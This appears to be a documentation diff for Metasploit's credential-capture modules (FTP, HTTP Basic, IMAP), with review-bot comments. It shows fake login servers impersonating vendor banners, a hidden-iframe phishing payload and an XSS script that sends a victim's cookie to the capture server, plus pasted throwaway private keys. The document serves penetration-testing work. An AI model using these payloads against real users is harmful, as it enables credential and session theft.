* `ProFTPD 1.3.4a Server (FTP-Server)`

**SSL**

Boolean if SSL should be used, making this FTPS. FTPS is typically run on port 990. If `SSLCert` is not set, a certificate
will be automatically generated. Default is `False`.

**SSLCert**

File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.

## Scenarios

### FTP Emulating Microsoft with Telnet Client

Server:

```
msf5 > use auxiliary/server/capture/ftp
msf5 auxiliary(server/capture/ftp) > set banner "Microsoft FTP Service"
banner => Microsoft FTP Service
msf5 auxiliary(server/capture/ftp) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/ftp) >
[*] Started service listener on 0.0.0.0:21
[*] Server started.
[+] FTP LOGIN 127.0.0.1:44526 root / SuperSecret9
```

Client:

```
root@kali:~# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 Microsoft FTP Service
USER root
331 User name okay, need password...
PASS SuperSecret9
500 Error
```

### FTPS with Self-Signed Certificate and curl/lftp Client

Server:

```
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Generating a RSA private key
.................................+++++
........+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
msf5 > cat key.pem certificate.pem > selfsigned.pem
[*] exec: cat key.pem certificate.pem > selfsigned.pem

msf5 > cat /root/metasploit-framework/selfsigned.pem
[*] exec: cat /root/metasploit-framework/selfsigned.pem

-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDMboMCNpx4nk16
vx/4gPn7yzMDHh/iTm27gIQKlktxNNKo+I53Cl4vpxLTN4NHxBn47hAlLUm3cADx
j/S9P6f62/GfcKsSeuN7VZ+anRyrdcmsKKenykv3wlfRAR5z7txqiO6LPQpUwiJT
7sgVo8TYRkIIziEXarihk0w1eMKUVlFVR92HFyLaBv0Y1ftCCrZufq6QgStzwjwh
qKFaWXSE3IjYwbVJs03dF2jBVQCVXBj4BTydwYxJ9NrCnwX7BgeRzJWKV+U4akxU
unt5t3/NXJbeTNcHrcvY2CQK4kDhu37xy99jUvOxYxw+8P2HHEgmQWfzHJAJKYCX
wKsFlR53AgMBAAECggEAA0jfSADSoMmCWy+I9vgzjA0mw60PPBaggru842Ko0afU
nqxntZfwDXn0vnoM3PFUrYA9uCszHQRqr3btqsDEFS7FghdQWFqrHwcwKk7N8B9T
XzXEA9knQVLZEF2hPKGg3wFWO9x+NwBrhse2ZUqdVhBC7VtKgtLPJqF0PwOytKlq
/pYniZdkLPrGHcQ13f50vr/dlkIGQ4YaKcAFTjCOxnK7q4of+sa75hFsXVwtnz9j
nw2SEs+SHEfLUl8wPww3IvwCkqFaosagIey2NyTtHxR3lqHobaOmu1nqXkNu/oXk
bt67M3D8VOrKu2aR9sMbirnpjSj+aBSaIjso6kSCaQKBgQD+VdrjMJu3Cr4LSoZL
FV7cog0HBlp3KE910rtY+VHH6c7jo4ow5vVvfITt78/Ntrkj1jAamAV2xA9okMay
7BlL3MVx/MKeQTwEWjTWIed/7Xc5D8o/PqMC8WkIc0Uur3BprwkGTL+wBqo9PHSO
eGo3zcdpbRrL0616o/7+uWIL1QKBgQDNxQq6tBlCY9ckuoof9SmayCmcU4t4Wusx
UJWBN32X8IGVGJRCxMlfwzLUlJwOTIWSkCj6Dw8/njsehda3KgqXbzfemIqD9K+j
/EL/ktrgBmh8ajnjBJX/2O7PsmeF7gFuDjVWflcG6WpuKFapkTsbU4D6ITmLi4uH
0Ot0CMDjGwKBgQCpQrv0XKIUs/p8CzHKgENsdBBVb33/NP2EvSTfdrVdZRXB21GZ
b+tBMc5Jh0J1djhKSD4lRKzGOH7EqS0DYCsJmLhyPrPKnEFz6BCnvVKSiZfBiuef
JXFZAQ5UiFovUqRuQQWxgpxDanwbWsN7GVofHzypxemCYrJeHwwRu5ArrQKBgDpz
FjEip2osYhiUxFd/lGnbIba+JIfzi4tekJk74fke4DAx4yt0Kp+BGxc3f3ywT+Dq
AjnFvVcc4z4wVmWBE7EgboZUXkRNZPb32TAvzuyD5Xox0m+iBdm/DVcCHlX03YMd
lhkTmjTkaM8RtkxEbL2+Yoyqk2YIJYJW3gr/0YqxAoGAe95gaeyjz5IvA/Spfztt
t8Sw0PSNKhw7Th4UwYW1g38Yh/oedHjI/cwV2oegoGRe15nQGQ3IYhyB7yTtsRJI
lVcthX4E1hPRsB3DiuldwWSxJcFhlhm72p/nas/ZsIkE4mKWccj6hJFUlnGhQh+y
dUubf5UfmaGETVVd8MbMNvQ=
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUDSznPwoelB25d/7v7bk+mjkDb0kwDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDUwMjAxMDVaFw0xOTEx
MDUwMjAxMDVaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDMboMCNpx4nk16vx/4gPn7yzMDHh/iTm27gIQKlktx
NNKo+I53Cl4vpxLTN4NHxBn47hAlLUm3cADxj/S9P6f62/GfcKsSeuN7VZ+anRyr
dcmsKKenykv3wlfRAR5z7txqiO6LPQpUwiJT7sgVo8TYRkIIziEXarihk0w1eMKU
VlFVR92HFyLaBv0Y1ftCCrZufq6QgStzwjwhqKFaWXSE3IjYwbVJs03dF2jBVQCV
XBj4BTydwYxJ9NrCnwX7BgeRzJWKV+U4akxUunt5t3/NXJbeTNcHrcvY2CQK4kDh
u37xy99jUvOxYxw+8P2HHEgmQWfzHJAJKYCXwKsFlR53AgMBAAGjUzBRMB0GA1Ud
DgQWBBQzY/telaztoKPEd1vfKqXQ1khMWTAfBgNVHSMEGDAWgBQzY/telaztoKPE
d1vfKqXQ1khMWTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAT
ch32xF4s6X4YTg00zbhztiBGxjDDSp6ULk68E6GuxSDcB+wE/nL66urdZJTvlFZk
M26to4odpNhCnYiKIJr4eGvk/8H83yHJn4yr1O2Xy0MJ3piGt4gJm6cA9/DdOzlE
U3tE8X+lcbq4fiz8pkUOU219jiw63OCfB7N1iGMdqCkpLWbGYXH71SAWqzpPFMsA
0oBDYjN1rMBSVA5sFteZNNkidHRE7OaXCAQ20htLZe0cO1rWMO44JKEKalwJW4YZ
n9UgZH3Kq/ptE3Jw6gdj11XT1RSn5NgCutxeCEuPzUhwg3XmVL5fOASJbohQxdGb
mVuIIRbrDW/sOgu2Viis
-----END CERTIFICATE-----

msf5 > use auxiliary/server/capture/ftp
msf5 auxiliary(server/capture/ftp) > set srvport 990
srvport => 990
msf5 auxiliary(server/capture/ftp) > set ssl true
ssl => true
msf5 auxiliary(server/capture/ftp) > set sslcert /root/metasploit-framework/selfsigned.pem
sslcert => /root/metasploit-framework/selfsigned.pem
msf5 auxiliary(server/capture/ftp) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/ftp) >
[*] Started service listener on 0.0.0.0:990
[*] Server started.
[+] FTP LOGIN 127.0.0.1:33618 admin / password123
[+] FTP LOGIN 127.0.0.1:33758 admin / password4321
```

Clients:

```
root@kali:~# curl -k --ftp-ssl --user admin:password123 ftps://127.0.0.1:990
curl: (67) Access denied: 500
root@kali:~# lftp ftps://admin:password4321@127.0.0.1:990 -e "set ssl:verify-certificate no; dir;"
ls: Login failed: 500 Error
```

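Review bot: BANNER is described as the "200 server message", but the FTP greeting is a 220 reply, as the telnet transcript shows (`220 Microsoft FTP Service`); fix the code. "Default is ``." for SSLCert renders as an empty code span; write "Default is empty (none)". The telnet transcript shows the `331 User name okay, need password...` reply being sent before any check, which is what allows the password to be captured; the description should say so rather than only mentioning the `500`. The scenario pastes a complete (throwaway) private key and certificate into the doc; trim both to `[snip]` as the libssh doc does, so the key is not mistaken for something to reuse. Also "The Banner" and "Boolean if SSL should be used" read better as "The banner" and "Whether SSL should be used".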
@ -0,0 +1,271 @@
This module creates a mock web server which, utilizing a HTTP 401 response, prompts the user to enter credentials for Basic Authentication.

## Verification Steps

1. Start msfconsole
2. Do: ```use auxiliary/server/capture/http_basic```
3. Do: ```run```

## Options

**REALM**

The Realm for the Basic Authentication, which may be displayed in the input box to the user.
Default is `Secure Site`.
Some notable Realms to emulate:

* `level_15 or view_access`
* `cPanel`
* `HuaweiHomeGateway`
* `Broadband Router`

**RedirectURL**

After the user enters a set of credentials, their browser will be redirected to this address. Default is ``.

**SSL**

Boolean if SSL should be used, making this HTTPS. HTTPS is typically run on port 443. If `SSLCert` is not set, a certificate
will be automatically generated. Default is `False`.

**SSLCert**

File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.

**URIPATH**

What URI should be utilized to prompt for the Basic Authentication. For instance, you may want this to run on `/cisco` if you use
the `REALM` `level_15 or view_access`. Default is ``, which will randomly generate a URIPATH.

## Scenarios

### Cisco Emulator with wget Client

Server:

```
msf5 > use auxiliary/server/capture/http_basic
msf5 auxiliary(server/capture/http_basic) > set REALM "level_15 or view_access"
REALM => level_15 or view_access
msf5 auxiliary(server/capture/http_basic) > set uripath '/cisco'
uripath => /cisco
msf5 auxiliary(server/capture/http_basic) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/http_basic) >
[*] Using URL: http://0.0.0.0:80/cisco
[*] Local IP: http://10.1.1.1:80/cisco
[*] Server started.
[*] Sending 401 to client 127.0.0.1
[+] 127.0.0.1 - Credential collected: "cisco:cisco" => /cisco
```

Client:

```
root@kali:~# wget http://cisco:cisco@127.0.0.1:80/cisco
--2018-11-05 19:44:29-- http://cisco:*password*@127.0.0.1/cisco
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 401 Unauthorized
Authentication selected: Basic realm="level_15 or view_access"
Reusing existing connection to 127.0.0.1:80.
HTTP request sent, awaiting response... 404 Not Found
2018-11-05 19:44:29 ERROR 404: Not Found.
```

### HTTPS with Self-Signed Certificate and curl Client

Server:

```
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Generating a RSA private key
............+++++
.+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
msf5 > cat key.pem certificate.pem > selfsigned.pem
[*] exec: cat key.pem certificate.pem > selfsigned.pem

msf5 > cat /root/metasploit-framework/selfsigned.pem
[*] exec: cat /root/metasploit-framework/selfsigned.pem

-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCmniuSmx1h57hK
XxBCfCOfsfJatMEtsrTHFCC0GDvIIHGot8oniVKes7yK0w8GSr0LeJgH23QMf/N0
SZlF6BRc0GELAC7qPa9VJ8HPYYVbO/VaqXMy83y7YuSh6QlP/DksHt0W0rfvcM36
ypHiZ3LIbaz8VuAUyIU5Qa6G+TNvwClhQnaX3TLN0kk31pAwwuSRNvSYvmUih4HA
eN29IJyoiXH+GEjw7wBbm9dkbU1DI71zSZyO/Tfi/2SwDwaTKCucW7tUEd9ey6AU
5hB6jGpc9N7rMYqV82mLogsXGaRDWh/tt9hghGWAX3MfD7EebQqYr4vQssoisU62
ct4DtCrNAgMBAAECggEAJ8ZohnYLHJ0xjGeHPSffZTcYsPiniR45M7ElYXjLhKni
GDHPy4Jnu8UShF2AH7Nlz8A5It8LpBRDbQZI1bxiaAnCsNqZWIfjPEPia3xPVolI
uBztiENCCoXAKLq142dFyrePdexVxo46Td1f2Blz+E7eVdrzYWLBEvsQC96fndRx
|
||||
8j6KT17tIhGz+9+87dwVUXiiBZTzeWRf94jofek3XWADlu6QjAd3qW944ljYyB7p
|
||||
+cJGwod5xFUxRdAr12RN+VIuzyP6xUXkfBQImdT3E0nR8LWwb4FcjwrCtCNEEYqU
|
||||
/CEBx8rm0qt7mBLiIjTq5+clfKKbd1XOXmGn7+7A7QKBgQDdoJl7NBcpBtLMC1kY
|
||||
KK78kar+nWS5am9H/3o76+sRmQGOCjRg9TyQBmqGkxb7en/m/xZzmS0QxbLCbChj
|
||||
nOgFn9owQKQ4a2FPiNHQ1BQ7F44E+B4j+1auS7VnpbzhPgyOwmZcDoRn5h+FeNwW
|
||||
Xma/o+a78rp53eTzG9Hy8lFMwwKBgQDAdX8h8Us1d34a/GuFljUBe5iJNo1giqgq
|
||||
X8R2BCshvQWoT2wz3YX4FRBKMZKdfwLfbRxK1bzW7BinpgoNR6NV0lor75BgQiCJ
|
||||
nztUMCfDAkxwCgXZjR20OS106G/SRjRgLtYkdDhmfynyy2MSAKhmVaLxBa57VlXD
|
||||
ZE2G4jdxLwKBgQCu1oReGnDu77AaQhWOJoItQ+lmpdoRH/McFGJkpS+zmUYNvOUn
|
||||
XC/j2vvsoFswFqqSG8ild0CDC8OC93pBY0XzMfEZwdULoUKKUQBcwwIWv/VM3ERC
|
||||
1IPESnuYgbpo4t9bO+cuVlGD+ZoCXJ8bkmtyYaWjvc/4VeHJG7hb9WfHqwKBgAe5
|
||||
L17nVgNRRkhC9PWpb3sdwKNRAx9qsRDyQuoRhMGX2lBEz6zNKQEppzuy/ZVAcZcR
|
||||
w97k8O0XEG455ZFe3JknFeNJe9vBC5k6QKFCRXY382VToaR3W0fOO5rDcSlZE+UA
|
||||
PCu+Vj0WwVIzA0jHqfphWWaeub/NWSe8MLhG/76VAoGBALTnftXB/b45xkgNEIZ3
|
||||
7WOsfvGo23tlXSQdCNNOn6YKptqYX88jeihcKEvGoIBH+LfV/GfD2P1d227kHyBZ
|
||||
FoZ+2dUwVXO2UP5j3WlxBleOqk0rTbIri/Pj4oCajAR4pXDIviUD+bUFojyFaysj
|
||||
It3LYabipjgG3NjDxYBMyJnt
|
||||
-----END PRIVATE KEY-----
|
||||
-----BEGIN CERTIFICATE-----
|
||||
MIIDazCCAlOgAwIBAgIUXlRMetgIkrPIiamQGIBKbcEuT1IwDQYJKoZIhvcNAQEL
|
||||
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
|
||||
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDYwMDQ2NDFaFw0xOTEx
|
||||
MDYwMDQ2NDFaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
|
||||
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
|
||||
AQUAA4IBDwAwggEKAoIBAQCmniuSmx1h57hKXxBCfCOfsfJatMEtsrTHFCC0GDvI
|
||||
IHGot8oniVKes7yK0w8GSr0LeJgH23QMf/N0SZlF6BRc0GELAC7qPa9VJ8HPYYVb
|
||||
O/VaqXMy83y7YuSh6QlP/DksHt0W0rfvcM36ypHiZ3LIbaz8VuAUyIU5Qa6G+TNv
|
||||
wClhQnaX3TLN0kk31pAwwuSRNvSYvmUih4HAeN29IJyoiXH+GEjw7wBbm9dkbU1D
|
||||
I71zSZyO/Tfi/2SwDwaTKCucW7tUEd9ey6AU5hB6jGpc9N7rMYqV82mLogsXGaRD
|
||||
Wh/tt9hghGWAX3MfD7EebQqYr4vQssoisU62ct4DtCrNAgMBAAGjUzBRMB0GA1Ud
|
||||
DgQWBBR+MfL8LopA4OaIRLGK1gof3u+PIDAfBgNVHSMEGDAWgBR+MfL8LopA4OaI
|
||||
RLGK1gof3u+PIDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBe
|
||||
IGmZr3wlO32b25qj/4qB7ewukwF6uaS4OQh4VLlUk8uYsqoGfvehAaNNJsu1oKO5
|
||||
XpShHeyEkpwzgx0mdCmQSB3JKseFYuZTgP9GP00EXuHYl2V+quPFN17fq0AgYN6K
|
||||
TFDwzYbhWyFGz7k++i23w0/dwvL2dLH+bgdHYU49rhlZIAu7PgbyIuhP+M2ltcjt
|
||||
NDO8po38u2ba52E56abfg0ZlFBqsua2s1TPHIyQ9iovTPMg1E5UTTGebaN6/BaMh
|
||||
Oj6N43ld9EONST6BhP3v1buoWHi1FMouocrUkUDuahiHoLlK4ERSUrb4uNnwko24
|
||||
WdNCCmA8APA1qf2BYVqs
|
||||
-----END CERTIFICATE-----
|
||||
msf5 > use auxiliary/server/capture/http_basic
|
||||
msf5 auxiliary(server/capture/http_basic) > set ssl true
|
||||
ssl => true
|
||||
msf5 auxiliary(server/capture/http_basic) > set srvport 443
|
||||
srvport => 443
|
||||
msf5 auxiliary(server/capture/http_basic) > set sslcert /root/metasploit-framework/selfsigned.pem
|
||||
sslcert => /root/metasploit-framework/selfsigned.pem
|
||||
msf5 auxiliary(server/capture/http_basic) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/http_basic) >
|
||||
[*] Using URL: https://0.0.0.0:443/4w0tML
|
||||
[*] Local IP: https://192.168.2.117:443/4w0tML
|
||||
[*] Server started.
|
||||
[+] 127.0.0.1 - Credential collected: "admin:password123" => /4w0tML
|
||||
```
|
||||
|
||||
Clients:
|
||||
|
||||
```
|
||||
root@kali:~# curl -k --user admin:password123 https://127.0.0.1/4w0tML
|
||||
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|
||||
<html><head>
|
||||
<title>404 Not Found</title>
|
||||
</head><body>
|
||||
<h1>Not Found</h1>
|
||||
<p>The requested URL was not found on this server.</p>
|
||||
<hr>
|
||||
<address>Apache/2.2.9 (Unix) Server at Port 443</address>
|
||||
</body></html>
|
||||
```
|
||||
|
||||
### HTML Injection Social Engineering
|
||||
|
||||
In this scenario, we're able to inject HTML (but not script) into a website. We'll inject an `iframe`
|
||||
that will load our basic authentication website. This payload will pop-up a login box, with the REALM (title)
|
||||
set to the website, which will hopefully trick a user into entering their credentials.
|
||||
**The following scenario is a demonstration, no actual vulnerability was identified, or tested.
|
||||
The HTML was simply edited in the local browser.**
|
||||
|
||||
HTML Payload Injected:
|
||||
|
||||
```html
|
||||
<iframe width="0" height="0" src="http://127.0.0.1/"></iframe>
|
||||
```
|
||||
|
||||
Server:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/http_basic
|
||||
msf5 auxiliary(server/capture/http_basic) > set uripath '/'
|
||||
uripath => /
|
||||
msf5 auxiliary(server/capture/http_basic) > set REALM "Wordpress.com Login"
|
||||
REALM => Wordpress.com Login
|
||||
msf5 auxiliary(server/capture/http_basic) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/http_basic) >
|
||||
[*] Using URL: http://0.0.0.0:80/
|
||||
[*] Local IP: http://192.168.2.117:80/
|
||||
[*] Server started.
|
||||
[*] Sending 401 to client 127.0.0.1
|
||||
[+] 127.0.0.1 - Credential collected: "metasploit_blog:ms08-0sK1NG!" => /
|
||||
```
|
||||
|
||||
Client:
|
||||
|
||||
![Injected Payload](https://user-images.githubusercontent.com/752491/48039039-326e1880-e141-11e8-9971-d9c88081d0df.png)
|
||||
|
||||
### XSS Cookie Theft
|
||||
|
||||
In this scenario, we're able to inject JavaScript into a website. We'll first get the user's cookie, then with jQuery
|
||||
pull the username from the `username` field. Because the cookie may contain fields break URI parsing (like `@`)
|
||||
we use `btoa` to base64 encode the cookie. Next we'll write an `iframe`
|
||||
that will silently attempt a login to our basic authentication website.
|
||||
**The following scenario is a demonstration, no actual vulnerability was identified, or tested.
|
||||
The HTML was simply edited in the local browser.**
|
||||
|
||||
Payload:
|
||||
|
||||
```html
|
||||
<script>
|
||||
var cookie = document.cookie;
|
||||
var username = $('#username').text();
|
||||
document.write('<iframe width="0" height="0" src="http://' + username + ':' + btoa(cookie) + '@127.0.0.1/"></iframe>');
|
||||
</script>
|
||||
```
|
||||
|
||||
Sever:
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/server/capture/http_basic
|
||||
msf5 auxiliary(server/capture/http_basic) > set uripath '/'
|
||||
uripath => /
|
||||
msf5 auxiliary(server/capture/http_basic) > set REALM "Login"
|
||||
REALM => Login
|
||||
msf5 auxiliary(server/capture/http_basic) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf5 auxiliary(server/capture/http_basic) >
|
||||
[*] Using URL: http://0.0.0.0:80/
|
||||
[*] Local IP: http://192.168.2.117:80/
|
||||
[*] Server started.
|
||||
[*] Sending 401 to client 127.0.0.1
|
||||
[+] 127.0.0.1 - Credential collected: "h00die:R1VDPUFRRUJBUUZicVNGY2owSWVBQVJuJnM9QVFBQUFFUmFpakN4Jmc9VzZmYkdROyB1Y3M9bG5jdD0xNTM3NzI3MjQ4OyBjbXA9dD0xNTQxNDY4ODQ1Jmo9MDsgZmxhc2hfZW5hYmxlZD0wOyBhcGVhZj10ZC1hcHBsZXQtc3RyZWFtPSU3QiUyMnRtcGwlMjIlM0ElMjJpdGVtcyUyMiUyQyUyMmx2JTIyJTNBMTU0MTQ3MDY0NjI4OCU3RDsgSFA9MTsgQj1jN2tvYTYxZDY5dHBzJmI9MyZzPTVy" => /
|
||||
```
|
||||
|
||||
Decoding the cookie:
|
||||
|
||||
```
|
||||
msf5 auxiliary(server/capture/http_basic) > irb
|
||||
[*] Starting IRB shell...
|
||||
[*] You are in auxiliary/server/capture/http_basic
|
||||
|
||||
>> Base64.decode64('R1VDPUFRRUJBUUZicVNGY2owSWVBQVJuJnM9QVFBQUFFUmFpakN4Jmc9VzZmYkdROyB1Y3M9bG5jdD0xNTM3NzI3MjQ4OyBjbXA9dD0xNTQxNDY4ODQ1Jmo9MDsgZmxhc2hfZW5hYmxlZD0wOyBhcGVhZj10ZC1hcHBsZXQtc3RyZWFtPSU3QiUyMnRtcGwlMjIlM0ElMjJpdGVtcyUyMiUyQyUyMmx2JTIyJTNBMTU0MTQ3MDY0NjI4OCU3RDsgSFA9MTsgQj1jN2tvYTYxZDY5dHBzJmI9MyZzPTVy')
|
||||
=> "GUC=AQEBAAFbqSFcj0IeBARn&s=AQADAERaieCx&g=W2fb9Q; ucs=lnct=1537714242; cmp=t=1247468145&j=0; flash_enabled=0; apeaf=td-applet-stream=%7B%22tmpl%22%3A%22items%22%2C%22lv%22%3A1541470698788%7D; HP=1; B=c7koa55d69tbs&b=3&s=5r"
|
||||
```
|
|
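Review bot: the HTTPS scenario pastes the entire contents of selfsigned.pem, roughly sixty lines of private key and certificate, into the documentation; the `cat /root/metasploit-framework/selfsigned.pem` step adds nothing that `openssl req ...` and `cat key.pem certificate.pem > selfsigned.pem` do not already show, so replace the PEM body with an elision such as `[...]` to keep the scenario readable. Also, the label `Sever:` in the XSS Cookie Theft scenario should read `Server:`, matching the other scenarios.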
@ -0,0 +1,174 @@
This module creates a mock IMAP server which accepts credentials.

## Verification Steps

1. Start msfconsole
2. Do: ```use auxiliary/server/capture/imap```
3. Do: ```run```

## Options

**BANNER**

The Banner which should be displayed. Default is `IMAP4`.
Some notable banners to emulate:

* `Dovecot ready.`
* `IMAP 4 Server (IMail 9.23)`
* `mailserver Cyrus IMAP4 v2.2.13-Debian-2.2.13-19 server ready`
* `Welcome to Binc IMAP v1.3.4 Copyright (C) 2002-2005 Andreas Aardal Hanssen at 2018-11-08 11:17:35 +1100`
* `The Microsoft Exchange IMAP4 service is ready.`
* `Microsoft Exchange Server 2003 IMAP4rev1 server versino 6.5.7638.1 (domain.local) ready.`

**SSL**

Boolean if SSL should be used, making this Secure IMAP. Secure IMAP is typically run on port 993. If `SSLCert` is not set, a certificate
will be automatically generated. Default is `False`.

**SSLCert**

File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.

## Scenarios

### IMAP Emulating Microsoft Exchange with Telnet Client

Server:

```
msf5 > use auxiliary/server/capture/imap
msf5 auxiliary(server/capture/imap) > set banner "The Microsoft Exchange IMAP4 service is ready."
banner => The Microsoft Exchange IMAP4 service is ready.
msf5 auxiliary(server/capture/imap) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/imap) >
[*] Started service listener on 0.0.0.0:143
[*] Server started.
[*] IMAP LOGIN 127.0.0.1:42972 metasploit@documentation.com / rapid7#1
```

Client:

```
root@kali:~# telnet 127.0.0.1 143
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
* OK The Microsoft Exchange IMAP4 service is ready.
01 LOGIN metasploit@documentation.com rapid7#1
quit
Connection closed by foreign host.
```

### Secure IMAP with Self-Signed Certificate and Alpine client

Server:

```
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem

Generating a RSA private key
.................................................................................................+++++
...................+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
msf5 > cat key.pem certificate.pem > selfsigned.pem
[*] exec: cat key.pem certificate.pem > selfsigned.pem

msf5 > cat /root/metasploit-framework/selfsigned.pem
[*] exec: cat /root/metasploit-framework/selfsigned.pem

-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDAXME8r2vEUH7B
Kelkt9iC4tTozOq0wJAjsACLCDcNoD4hUH16wy4Uf4SD3ZsEaL0YA0GU2ZgOo2ud
USBpOo8h9FEGtRrAAeSl7Z3XaBnuB7UmVMrnUVZxlaYi84JcopcTOs6KZ5VXddia
PEkE5G3jaCwOIqHk+c8Qk5b43HQbkj2jr4051gHeWP0UgBEy1TVPKtoywtyK1b5H
QhX7MYVNge8lQL/xJnBrjMDqIQqc41lCI73EPCuGZ7zB06xBsgyW/DTgQkprX+Qe
DVKtz8ZChLSqSwmz/5yFttRyZlDuXA7Kozhdj8obRAjzK/gKj89WsX/s2KUbq2GY
pdMpLh7/AgMBAAECggEBALCtQKpdMCzqBdGijgP8u3ZToluDwlprtregco8/51iz
gf0VMXqsg8k96dc3laZyEKNackSlqfxf6npeRdeAenAkNrtjYYNS+c/Qs7Vhntc5
6w6euJHG6g9+9E2LvIMarolx7LvAMbFXwq6+ig5dQ/Sm/DerZWiqbJ18ASDnUhjz
G1Y8/Idy4WutPZD/0JEQ+5VnHb+Mt3a7yYKhDsmUEzVh5xoWJab9dwfwCnoOb32T
oLOLLsqUbAK8ZiQ4MwkbGJ5kw8H24wVmI+7BbuRacW2tIIt6Z+vEoLdof0TsuJWo
87ZbCYYeTysIgBIdLNRiGGxz43SOqBBGh8sreyyACdECgYEA6Ubs1Klw3TViABke
1JqkWelZi6mtsyUHJt/eChjMzgg5vGVuYB/sCc+BObjETbfnvuV0Ub4cxbUCF3wL
qvrJNTd+yU7JJ7IP63B2lS3aNlAsLRb59SkjDYyym1OeUAHKkGp8oICSq96X3Xtu
KUZnDdh2UuoMzmEoAHoDoc+SC/cCgYEA0xmQ+qDJ4l3JRH/IPMPe9XD90WFJFhvF
GzGSM8qqpg6N2xhlzQiM6+I4EEh9iNnCOYmvw9leGNRpIjFjAhv5ntlG3LudAEpd
Ml/hhrfRB7KOopiqzK7oVCUv5f5rmvYdL4c2FC+VGxnhWUP6MARUHag/1DgszMs7
wSlwcbKi8zkCgYBMvRc1khPdwSze6WSZ/dEo/rmFVykb8Idcw3Iwkh31fQE5N4jK
uFWWmJtjGKQDCQeEZckRBuBCLZxli1nvQhakmf/sSy2jEFFqWxG3W2EYUuFlZ9SM
UJ8GWw16SVSf7ybqwQ0EY6dcQJpmsq73hwBprpamCfZygcV9+qVtOnJJ2wKBgBKY
ZPH+6em70zfqfawEoQZD3sfr5vFAnvtHQZa4WpHoJEzReF44S5mXwtKEYDKG5BoH
a+k3o5dSVrSBXzRXXITGpPxatnjJFC6UzZv9YzdnXjMqeZkwKx0GbZK396id13JR
Wc0rZ9oMTJJ9b3N9Xh+Cq6S5EhE0Md5RFSuezcXZAoGBAJOMfjbwobOCYm6K8PyV
